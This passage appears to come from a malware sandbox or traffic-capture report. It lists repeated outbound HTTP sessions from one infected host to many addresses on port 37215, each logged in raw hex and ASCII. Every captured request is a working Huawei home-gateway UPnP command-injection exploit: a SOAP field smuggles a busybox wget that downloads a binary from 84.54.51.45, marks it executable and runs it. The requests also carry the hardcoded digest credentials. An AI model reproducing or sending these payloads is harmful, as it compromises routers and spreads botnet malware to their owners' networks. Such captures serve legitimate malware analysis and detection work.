72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1007192.168.2.154524841.224.78.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911663055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1008192.168.2.154317241.172.130.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911710024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1009192.168.2.155764641.37.14.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911725998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1010192.168.2.154167041.30.19.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911726952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1011192.168.2.154475241.25.66.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911727905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1012192.168.2.155834841.214.121.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911797047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1013192.168.2.153663641.120.33.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911844969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1014192.168.2.155306241.200.180.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911890984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1015192.168.2.155065241.182.43.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911892891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1016192.168.2.154264041.166.16.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911912918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1017192.168.2.154284841.113.2.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911915064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
